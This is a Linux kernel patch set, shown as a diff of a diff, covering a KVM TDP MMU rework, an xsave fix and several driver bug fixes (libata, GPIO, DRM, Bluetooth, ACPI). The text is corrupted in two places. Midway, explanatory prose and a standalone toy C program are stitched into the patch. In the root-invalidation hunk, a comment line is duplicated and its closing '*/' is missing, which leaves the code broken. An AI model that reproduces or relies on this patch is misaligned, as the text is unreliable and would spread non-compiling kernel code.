+-	 * avoiding an infinite loop.  By design, the root is reachable while
+-	 * it's being asynchronously zapped, thus a different task can put its
+-	 * last reference, i.e. flowing through kvm_tdp_mmu_put_root() for an
+-	 * asynchronously zapped root is unavoidable.
+-	 */
+-	kvm_tdp_mmu_put_root(kvm, root, true);
+-
+-	read_unlock(&kvm->mmu_lock);
+-}
+-
+-static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root)
+-{
+-	root->tdp_mmu_async_data = kvm;
+-	INIT_WORK(&root->tdp_mmu_async_work, tdp_mmu_zap_root_work);
+-	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -222,11 +169,11 @@ static struct kvm_mmu_page *tdp_mmu_next_root(struct kvm *kvm,
+ #define for_each_valid_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared)	\
+ 	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared, true)
+ 
+-#define for_each_tdp_mmu_root_yield_safe(_kvm, _root)			\
+-	for (_root = tdp_mmu_next_root(_kvm, NULL, false, false);		\
++#define for_each_tdp_mmu_root_yield_safe(_kvm, _root, _shared)			\
++	for (_root = tdp_mmu_next_root(_kvm, NULL, _shared, false);		\
+ 	     _root;								\
+-	     _root = tdp_mmu_next_root(_kvm, _root, false, false))		\
+-		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, false)) {		\
++	     _root = tdp_mmu_next_root(_kvm, _root, _shared, false))		\
++		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, _shared)) {		\
+ 		} else
+ 
+ /*
+@@ -305,7 +252,7 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	 * by a memslot update or by the destruction of the VM.  Initialize the
+ 	 * refcount to two; one reference for the vCPU, and one reference for
+ 	 * the TDP MMU itself, which is held until the root is invalidated and
+-	 * is ultimately put by tdp_mmu_zap_root_work().
++	 * is ultimately put by kvm_tdp_mmu_zap_invalidated_roots().
+ 	 */
+ 	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+@@ -963,7 +910,7 @@ bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	for_each_tdp_mmu_root_yield_safe(kvm, root)
++	for_each_tdp_mmu_root_yield_safe(kvm, root, false)
+ 		flush = tdp_mmu_zap_leafs(kvm, root, start, end, true, flush);
+ 
+ 	return flush;
+@@ -985,7 +932,7 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ 	 * is being destroyed or the userspace VMM has exited.  In both cases,
+ 	 * KVM_RUN is unreachable, i.e. no vCPUs will ever service the request.
+ 	 */
+-	for_each_tdp_mmu_root_yield_safe(kvm, root)
++	for_each_tdp_mmu_root_yield_safe(kvm, root, false)
+ 		tdp_mmu_zap_root(kvm, root, false);
+ }
+ 
+@@ -995,18 +942,47 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+  */
+ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ {
+-	flush_workqueue(kvm->arch.tdp_mmu_zap_wq);
++	struct kvm_mmu_page *root;
++
++	read_lock(&kvm->mmu_lock);
++
++	for_each_tdp_mmu_root_yield_safe(kvm, root, true) {
++		if (!root->tdp_mmu_scheduled_root_to_zap)
++			continue;
++
++		root->tdp_mmu_scheduled_root_to_zap = false;
++		KVM_BUG_ON(!root->role.invalid, kvm);
++
++		/*
++		 * A TLB flush is not necessary as KVM performs a local TLB
++		 * flush when allocating a new root (see kvm_mmu_load()), and
++		 * when migrating a vCPU to a different pCPU.  Note, the local
++		 * TLB flush on reuse also invalidates paging-structure-cache
++		 * entries, i.e. TLB entries for intermediate paging structures,
++		 * that may be zapped, as such entries are associated with the
++		 * ASID on both VMX and SVM.
++		 */
++		tdp_mmu_zap_root(kvm, root, true);
++
++		/*
++		 * The reference needs to be put *after* zapping the root, as
++		 * the root must be reachable by mmu_notifiers while it's being
++		 * zapped.
++		 */
++		kvm_tdp_mmu_put_root(kvm, root, true);
++	}
++
++	read_unlock(&kvm->mmu_lock);
+ }
+ 
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously.  Using a separate workqueue makes it
+- * easy to ensure that the destruction is performed before the "fast zap"
+- * completes, without keeping a separate list of invalidated roots; the list is
+- * effectively the list of work items in the workqueue.
++ * zapping is done separately so that it happens with mmu_lock held for read,
++ * whereas invalidating roots must be done with mmu_lock held for write (unless
++ * the VM is being destroyed).
+  *
+- * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * Note, kvm_tdp_mmu_zap_invalidated_roots() is gifted the TDP MMU's reference.
+  * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+@@ -1031,19 +1007,20 @@ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ 	/*
+ 	 * As above, mmu_lock isn't held when destroying the VM!  There can't
+ 	 * be other references to @kvm, i.e. nothing else can invalidate roots
+-	 * or be consuming roots, but walking the list of roots does need to be
+-	 * guarded against roots being deleted by the asynchronous zap worker.
++	 * or get/put references to roots.
+ 	 */
+-	rcu_read_lock();
+-
+-	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
++		/*
++		 * Note, invalid roots can outlive a memslot update!  Invalid
++		 * roots must be *zapped* before the memslot update completes,
++		 * but a different task can acquire a reference and keep the
++		 * root alive after its been zapped.
++		 * root alive after it's been zapped.
+ 		if (!root->role.invalid) {
++			root->tdp_mmu_scheduled_root_to_zap = true;
+ 			root->role.invalid = true;
+-			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
+-
+-	rcu_read_unlock();
+ }
+ 
+ /*
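
The TDP MMU rework replaces the per-root zap workqueue with a tdp_mmu_scheduled_root_to_zap flag: invalidation marks roots, and a later pass walks the list and zaps exactly the marked ones, skipping roots that were already invalid. A toy model of that two-phase scheme, with a hypothetical struct and printf standing in for tdp_mmu_zap_root():

#include <stdbool.h>
#include <stdio.h>

struct root {
	bool invalid;
	bool scheduled_to_zap;
};

/* Phase 1: mark every still-valid root; already-invalid roots were
 * scheduled by an earlier invalidation and are left alone. */
static void invalidate_all(struct root *roots, int n)
{
	for (int i = 0; i < n; i++) {
		if (!roots[i].invalid) {
			roots[i].scheduled_to_zap = true;
			roots[i].invalid = true;
		}
	}
}

/* Phase 2: zap exactly the roots marked in phase 1. */
static void zap_invalidated(struct root *roots, int n)
{
	for (int i = 0; i < n; i++) {
		if (!roots[i].scheduled_to_zap)
			continue;
		roots[i].scheduled_to_zap = false;
		printf("zapping root %d\n", i);	/* tdp_mmu_zap_root() */
	}
}

int main(void)
{
	struct root roots[3] = { {false}, {true}, {false} };

	invalidate_all(roots, 3);
	zap_invalidated(roots, 3);	/* zaps roots 0 and 2 only */
	return 0;
}
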
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index d0a9fe0770fdd..c82a8bb321bb9 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -65,7 +65,7 @@ u64 *kvm_tdp_mmu_fast_pf_get_last_sptep(struct kvm_vcpu *vcpu, u64 addr,
+ 					u64 *spte);
+ 
+ #ifdef CONFIG_X86_64
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
++void kvm_mmu_init_tdp_mmu(struct kvm *kvm);
+ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return sp->tdp_mmu_page; }
+ 
+@@ -86,7 +86,7 @@ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+ 	return sp && is_tdp_mmu_page(sp) && sp->root_count;
+ }
+ #else
+-static inline int kvm_mmu_init_tdp_mmu(struct kvm *kvm) { return 0; }
++static inline void kvm_mmu_init_tdp_mmu(struct kvm *kvm) {}
+ static inline void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm) {}
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return false; }
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu) { return false; }
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index d3e66740c7c68..fb125b54ee680 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -542,8 +542,11 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
++	case AVIC_IPI_FAILURE_INVALID_IPI_VECTOR:
++		/* Invalid IPI with vector < 16 */
++		break;
+ 	default:
+-		pr_err("Unknown IPI interception\n");
++		vcpu_unimpl(vcpu, "Unknown avic incomplete IPI interception\n");
+ 	}
+ 
+ 	return 1;
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 8053974af326c..bc288e6bde642 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -1164,6 +1164,9 @@ void svm_leave_nested(struct kvm_vcpu *vcpu)
+ 
+ 		nested_svm_uninit_mmu_context(vcpu);
+ 		vmcb_mark_all_dirty(svm->vmcb);
++
++		if (kvm_apicv_activated(vcpu->kvm))
++			kvm_make_request(KVM_REQ_APICV_UPDATE, vcpu);
+ 	}
+ 
+ 	kvm_clear_request(KVM_REQ_GET_NESTED_STATE_PAGES, vcpu);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 1931d3fcbbe09..4d6baae1ae748 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5301,26 +5301,37 @@ static int kvm_vcpu_ioctl_x86_set_debugregs(struct kvm_vcpu *vcpu,
+ 	return 0;
+ }
+ 
+-static void kvm_vcpu_ioctl_x86_get_xsave(struct kvm_vcpu *vcpu,
+-					 struct kvm_xsave *guest_xsave)
+-{
+-	if (fpstate_is_confidential(&vcpu->arch.guest_fpu))
+-		return;
+-
+-	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu,
+-				       guest_xsave->region,
+-				       sizeof(guest_xsave->region),
+-				       vcpu->arch.pkru);
+-}
+ 
+ static void kvm_vcpu_ioctl_x86_get_xsave2(struct kvm_vcpu *vcpu,
+ 					  u8 *state, unsigned int size)
+ {
++	/*
++	 * Only copy state for features that are enabled for the guest.  The
++	 * state itself isn't problematic, but setting bits in the header for
++	 * features that are supported in *this* host but not exposed to the
++	 * guest can result in KVM_SET_XSAVE failing when live migrating to a
++	 * compatible host without the features that are NOT exposed to the
++	 * guest.
++	 *
++	 * FP+SSE can always be saved/restored via KVM_{G,S}ET_XSAVE, even if
++	 * XSAVE/XCR0 are not exposed to the guest, and even if XSAVE isn't
++	 * supported by the host.
++	 */
++	u64 supported_xcr0 = vcpu->arch.guest_supported_xcr0 |
++			     XFEATURE_MASK_FPSSE;
++
+ 	if (fpstate_is_confidential(&vcpu->arch.guest_fpu))
+ 		return;
+ 
+-	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu,
+-				       state, size, vcpu->arch.pkru);
++	fpu_copy_guest_fpstate_to_uabi(&vcpu->arch.guest_fpu, state, size,
++				       supported_xcr0, vcpu->arch.pkru);
++}
++
++static void kvm_vcpu_ioctl_x86_get_xsave(struct kvm_vcpu *vcpu,
++					 struct kvm_xsave *guest_xsave)
++{
++	return kvm_vcpu_ioctl_x86_get_xsave2(vcpu, (void *)guest_xsave->region,
++					     sizeof(guest_xsave->region));
+ }
+ 
+ static int kvm_vcpu_ioctl_x86_set_xsave(struct kvm_vcpu *vcpu,
+@@ -12442,9 +12453,7 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = kvm_mmu_init_vm(kvm);
+-	if (ret)
+-		goto out_page_track;
++	kvm_mmu_init_vm(kvm);
+ 
+ 	ret = static_call(kvm_x86_vm_init)(kvm);
+ 	if (ret)
+@@ -12489,7 +12498,6 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 
+ out_uninit_mmu:
+ 	kvm_mmu_uninit_vm(kvm);
+-out_page_track:
+ 	kvm_page_track_cleanup(kvm);
+ out:
+ 	return ret;
+diff --git a/drivers/acpi/irq.c b/drivers/acpi/irq.c
+index c2c786eb95abc..1687483ff319e 100644
+--- a/drivers/acpi/irq.c
++++ b/drivers/acpi/irq.c
+@@ -57,6 +57,7 @@ int acpi_register_gsi(struct device *dev, u32 gsi, int trigger,
+ 		      int polarity)
+ {
+ 	struct irq_fwspec fwspec;
++	unsigned int irq;
+ 
+ 	fwspec.fwnode = acpi_get_gsi_domain_id(gsi);
+ 	if (WARN_ON(!fwspec.fwnode)) {
+@@ -68,7 +69,11 @@ int acpi_register_gsi(struct device *dev, u32 gsi, int trigger,
+ 	fwspec.param[1] = acpi_dev_get_irq_type(trigger, polarity);
+ 	fwspec.param_count = 2;
+ 
+-	return irq_create_fwspec_mapping(&fwspec);
++	irq = irq_create_fwspec_mapping(&fwspec);
++	if (!irq)
++		return -EINVAL;
++
++	return irq;
+ }
+ EXPORT_SYMBOL_GPL(acpi_register_gsi);
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index fbc231a3f7951..fa2fc1953fc26 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -2456,7 +2456,7 @@ static int ata_dev_config_lba(struct ata_device *dev)
+ {
+ 	const u16 *id = dev->id;
+ 	const char *lba_desc;
+-	char ncq_desc[24];
++	char ncq_desc[32];
+ 	int ret;
+ 
+ 	dev->flags |= ATA_DFLAG_LBA;
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 2a04dd36a4948..1eaaf01418ea7 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2247,7 +2247,7 @@ static void ata_eh_link_report(struct ata_link *link)
+ 	struct ata_eh_context *ehc = &link->eh_context;
+ 	struct ata_queued_cmd *qc;
+ 	const char *frozen, *desc;
+-	char tries_buf[6] = "";
++	char tries_buf[16] = "";
+ 	int tag, nr_failed = 0;
+ 
+ 	if (ehc->i.flags & ATA_EHI_QUIET)
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 7de1f27d0323d..df1f78abdf266 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1572,7 +1572,7 @@ static int dev_get_regmap_match(struct device *dev, void *res, void *data)
+ 
+ 	/* If the user didn't specify a name match any */
+ 	if (data)
+-		return !strcmp((*r)->name, data);
++		return (*r)->name && !strcmp((*r)->name, data);
+ 	else
+ 		return 1;
+ }
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index f2062c2a28da8..96d4f48e36011 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -3984,6 +3984,7 @@ static int btusb_probe(struct usb_interface *intf,
+ 
+ 	if (id->driver_info & BTUSB_QCA_ROME) {
+ 		data->setup_on_usb = btusb_setup_qca;
++		hdev->shutdown = btusb_shutdown_qca;
+ 		hdev->set_bdaddr = btusb_set_bdaddr_ath3012;
+ 		hdev->cmd_timeout = btusb_qca_cmd_timeout;
+ 		set_bit(HCI_QUIRK_SIMULTANEOUS_DISCOVERY, &hdev->quirks);
+diff --git a/drivers/bluetooth/hci_vhci.c b/drivers/bluetooth/hci_vhci.c
+index c443c3b0a4da5..4415d850d698b 100644
+--- a/drivers/bluetooth/hci_vhci.c
++++ b/drivers/bluetooth/hci_vhci.c
+@@ -74,7 +74,10 @@ static int vhci_send_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 	struct vhci_data *data = hci_get_drvdata(hdev);
+ 
+ 	memcpy(skb_push(skb, 1), &hci_skb_pkt_type(skb), 1);
++
++	mutex_lock(&data->open_mutex);
+ 	skb_queue_tail(&data->readq, skb);
++	mutex_unlock(&data->open_mutex);
+ 
+ 	wake_up_interruptible(&data->read_wait);
+ 	return 0;
+diff --git a/drivers/gpio/gpio-timberdale.c b/drivers/gpio/gpio-timberdale.c
+index de14949a3fe5a..92c1f2baa4bff 100644
+--- a/drivers/gpio/gpio-timberdale.c
++++ b/drivers/gpio/gpio-timberdale.c
+@@ -43,9 +43,10 @@ static int timbgpio_update_bit(struct gpio_chip *gpio, unsigned index,
+ 	unsigned offset, bool enabled)
+ {
+ 	struct timbgpio *tgpio = gpiochip_get_data(gpio);
++	unsigned long flags;
+ 	u32 reg;
+ 
+-	spin_lock(&tgpio->lock);
++	spin_lock_irqsave(&tgpio->lock, flags);
+ 	reg = ioread32(tgpio->membase + offset);
+ 
+ 	if (enabled)
+@@ -54,7 +55,7 @@ static int timbgpio_update_bit(struct gpio_chip *gpio, unsigned index,
+ 		reg &= ~(1 << index);
+ 
+ 	iowrite32(reg, tgpio->membase + offset);
+-	spin_unlock(&tgpio->lock);
++	spin_unlock_irqrestore(&tgpio->lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index a429176673e7a..314dfaa633857 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -30,7 +30,6 @@ struct fsl_gpio_soc_data {
+ 
+ struct vf610_gpio_port {
+ 	struct gpio_chip gc;
+-	struct irq_chip ic;
+ 	void __iomem *base;
+ 	void __iomem *gpio_base;
+ 	const struct fsl_gpio_soc_data *sdata;
+@@ -128,14 +127,14 @@ static int vf610_gpio_direction_output(struct gpio_chip *chip, unsigned gpio,
+ 	unsigned long mask = BIT(gpio);
+ 	u32 val;
+ 
++	vf610_gpio_set(chip, gpio, value);
++
+ 	if (port->sdata && port->sdata->have_paddr) {
+ 		val = vf610_gpio_readl(port->gpio_base + GPIO_PDDR);
+ 		val |= mask;
+ 		vf610_gpio_writel(val, port->gpio_base + GPIO_PDDR);
+ 	}
+ 
+-	vf610_gpio_set(chip, gpio, value);
+-
+ 	return pinctrl_gpio_direction_output(chip->base + gpio);
+ }
+ 
+@@ -207,20 +206,24 @@ static int vf610_gpio_irq_set_type(struct irq_data *d, u32 type)
+ 
+ static void vf610_gpio_irq_mask(struct irq_data *d)
+ {
+-	struct vf610_gpio_port *port =
+-		gpiochip_get_data(irq_data_get_irq_chip_data(d));
+-	void __iomem *pcr_base = port->base + PORT_PCR(d->hwirq);
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++	struct vf610_gpio_port *port = gpiochip_get_data(gc);
++	irq_hw_number_t gpio_num = irqd_to_hwirq(d);
++	void __iomem *pcr_base = port->base + PORT_PCR(gpio_num);
+ 
+ 	vf610_gpio_writel(0, pcr_base);
++	gpiochip_disable_irq(gc, gpio_num);
+ }
+ 
+ static void vf610_gpio_irq_unmask(struct irq_data *d)
+ {
+-	struct vf610_gpio_port *port =
+-		gpiochip_get_data(irq_data_get_irq_chip_data(d));
+-	void __iomem *pcr_base = port->base + PORT_PCR(d->hwirq);
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++	struct vf610_gpio_port *port = gpiochip_get_data(gc);
++	irq_hw_number_t gpio_num = irqd_to_hwirq(d);
++	void __iomem *pcr_base = port->base + PORT_PCR(gpio_num);
+ 
+-	vf610_gpio_writel(port->irqc[d->hwirq] << PORT_PCR_IRQC_OFFSET,
++	gpiochip_enable_irq(gc, gpio_num);
++	vf610_gpio_writel(port->irqc[gpio_num] << PORT_PCR_IRQC_OFFSET,
+ 			  pcr_base);
+ }
+ 
+@@ -237,6 +240,18 @@ static int vf610_gpio_irq_set_wake(struct irq_data *d, u32 enable)
+ 	return 0;
+ }
+ 
++static const struct irq_chip vf610_irqchip = {
++	.name = "gpio-vf610",
++	.irq_ack = vf610_gpio_irq_ack,
++	.irq_mask = vf610_gpio_irq_mask,
++	.irq_unmask = vf610_gpio_irq_unmask,
++	.irq_set_type = vf610_gpio_irq_set_type,
++	.irq_set_wake = vf610_gpio_irq_set_wake,
++	.flags = IRQCHIP_IMMUTABLE | IRQCHIP_MASK_ON_SUSPEND
++			| IRQCHIP_ENABLE_WAKEUP_ON_SUSPEND,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static void vf610_gpio_disable_clk(void *data)
+ {
+ 	clk_disable_unprepare(data);
+@@ -249,7 +264,6 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	struct vf610_gpio_port *port;
+ 	struct gpio_chip *gc;
+ 	struct gpio_irq_chip *girq;
+-	struct irq_chip *ic;
+ 	int i;
+ 	int ret;
+ 
+@@ -315,14 +329,6 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	gc->direction_output = vf610_gpio_direction_output;
+ 	gc->set = vf610_gpio_set;
+ 
+-	ic = &port->ic;
+-	ic->name = "gpio-vf610";
+-	ic->irq_ack = vf610_gpio_irq_ack;
+-	ic->irq_mask = vf610_gpio_irq_mask;
+-	ic->irq_unmask = vf610_gpio_irq_unmask;
+-	ic->irq_set_type = vf610_gpio_irq_set_type;
+-	ic->irq_set_wake = vf610_gpio_irq_set_wake;
+-
+ 	/* Mask all GPIO interrupts */
+ 	for (i = 0; i < gc->ngpio; i++)
+ 		vf610_gpio_writel(0, port->base + PORT_PCR(i));
+@@ -331,7 +337,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 	vf610_gpio_writel(~0, port->base + PORT_ISFR);
+ 
+ 	girq = &gc->irq;
+-	girq->chip = ic;
++	gpio_irq_chip_set_chip(girq, &vf610_irqchip);
+ 	girq->parent_handler = vf610_gpio_irq_handler;
+ 	girq->num_parents = 1;
+ 	girq->parents = devm_kcalloc(&pdev->dev, 1,
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 8472013ff38a2..0e78437c8389d 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -1991,6 +1991,7 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
+ 		case IP_VERSION(11, 0, 0):
+ 		case IP_VERSION(11, 0, 1):
+ 		case IP_VERSION(11, 0, 2):
++		case IP_VERSION(11, 0, 3):
+ 			*states = ATTR_STATE_SUPPORTED;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index b89f7f7ca1885..1b5c27ed27370 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -673,7 +673,7 @@ static struct ti_sn65dsi86 *bridge_to_ti_sn65dsi86(struct drm_bridge *bridge)
+ 	return container_of(bridge, struct ti_sn65dsi86, bridge);
+ }
+ 
+-static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
++static int ti_sn_attach_host(struct auxiliary_device *adev, struct ti_sn65dsi86 *pdata)
+ {
+ 	int val;
+ 	struct mipi_dsi_host *host;
+@@ -688,7 +688,7 @@ static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
+ 	if (!host)
+ 		return -EPROBE_DEFER;
+ 
+-	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
++	dsi = devm_mipi_dsi_device_register_full(&adev->dev, host, &info);
+ 	if (IS_ERR(dsi))
+ 		return PTR_ERR(dsi);
+ 
+@@ -706,7 +706,7 @@ static int ti_sn_attach_host(struct ti_sn65dsi86 *pdata)
+ 
+ 	pdata->dsi = dsi;
+ 
+-	return devm_mipi_dsi_attach(dev, dsi);
++	return devm_mipi_dsi_attach(&adev->dev, dsi);
+ }
+ 
+ static int ti_sn_bridge_attach(struct drm_bridge *bridge,
+@@ -1279,9 +1279,9 @@ static int ti_sn_bridge_probe(struct auxiliary_device *adev,
+ 	struct device_node *np = pdata->dev->of_node;
+ 	int ret;
+ 
+-	pdata->next_bridge = devm_drm_of_get_bridge(pdata->dev, np, 1, 0);
++	pdata->next_bridge = devm_drm_of_get_bridge(&adev->dev, np, 1, 0);
+ 	if (IS_ERR(pdata->next_bridge))
+-		return dev_err_probe(pdata->dev, PTR_ERR(pdata->next_bridge),
++		return dev_err_probe(&adev->dev, PTR_ERR(pdata->next_bridge),
+ 				     "failed to create panel bridge\n");
+ 
+ 	ti_sn_bridge_parse_lanes(pdata, np);
+@@ -1300,9 +1300,9 @@ static int ti_sn_bridge_probe(struct auxiliary_device *adev,
+ 
+ 	drm_bridge_add(&pdata->bridge);
+ 
+-	ret = ti_sn_attach_host(pdata);
++	ret = ti_sn_attach_host(adev, pdata);
+ 	if (ret) {
+-		dev_err_probe(pdata->dev, ret, "failed to attach dsi host\n");
++		dev_err_probe(&adev->dev, ret, "failed to attach dsi host\n");
+ 		goto err_remove_bridge;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 0cb646cb04ee1..d5c15292ae937 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -38,6 +38,14 @@ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data gpd_onemix2s = {
++	.width = 1200,
++	.height = 1920,
++	.bios_dates = (const char * const []){ "05/21/2018", "10/26/2018",
++		"03/04/2019", NULL },
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data gpd_pocket = {
+ 	.width = 1200,
+ 	.height = 1920,
+@@ -401,6 +409,14 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "LTH17"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* One Mix 2S (generic strings, also match on bios date) */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Default string"),
++		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "Default string"),
++		  DMI_EXACT_MATCH(DMI_BOARD_NAME, "Default string"),
++		},
++		.driver_data = (void *)&gpd_onemix2s,
+ 	},
+ 	{}
+ };
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index d445e2d63c9c8..d7e30d889a5ca 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -235,6 +235,7 @@ static vm_fault_t i915_error_to_vmf_fault(int err)
+ 	case 0:
+ 	case -EAGAIN:
+ 	case -ENOSPC: /* transient failure to evict? */
++	case -ENOBUFS: /* temporarily out of fences? */
+ 	case -ERESTARTSYS:
+ 	case -EINTR:
+ 	case -EBUSY:
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 1d0374a577a5e..fb4f0e336b60e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -234,6 +234,7 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 	npages = obj->size >> PAGE_SHIFT;
+ 	mtk_gem->pages = kcalloc(npages, sizeof(*mtk_gem->pages), GFP_KERNEL);
+ 	if (!mtk_gem->pages) {
++		sg_free_table(sgt);
+ 		kfree(sgt);
+ 		return -ENOMEM;
+ 	}
+@@ -243,12 +244,15 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 	mtk_gem->kvaddr = vmap(mtk_gem->pages, npages, VM_MAP,
+ 			       pgprot_writecombine(PAGE_KERNEL));
+ 	if (!mtk_gem->kvaddr) {
++		sg_free_table(sgt);
+ 		kfree(sgt);
+ 		kfree(mtk_gem->pages);
+ 		return -ENOMEM;
+ 	}
+-out:
++	sg_free_table(sgt);
+ 	kfree(sgt);
++
++out:
+ 	iosys_map_set_vaddr(map, mtk_gem->kvaddr);
+ 
+ 	return 0;
+diff --git a/drivers/hid/.kunitconfig b/drivers/hid/.kunitconfig
+index 04daeff5c970e..675a8209c7aeb 100644
+--- a/drivers/hid/.kunitconfig
++++ b/drivers/hid/.kunitconfig
+@@ -1,5 +1,6 @@
+ CONFIG_KUNIT=y
+ CONFIG_USB=y
+ CONFIG_USB_HID=y
++CONFIG_HID_BATTERY_STRENGTH=y
+ CONFIG_HID_UCLOGIC=y
+ CONFIG_HID_KUNIT_TEST=y
+diff --git a/drivers/hid/Kconfig b/drivers/hid/Kconfig
+index c1873ccc7248d..9ad5e43d9961b 100644
+--- a/drivers/hid/Kconfig
++++ b/drivers/hid/Kconfig
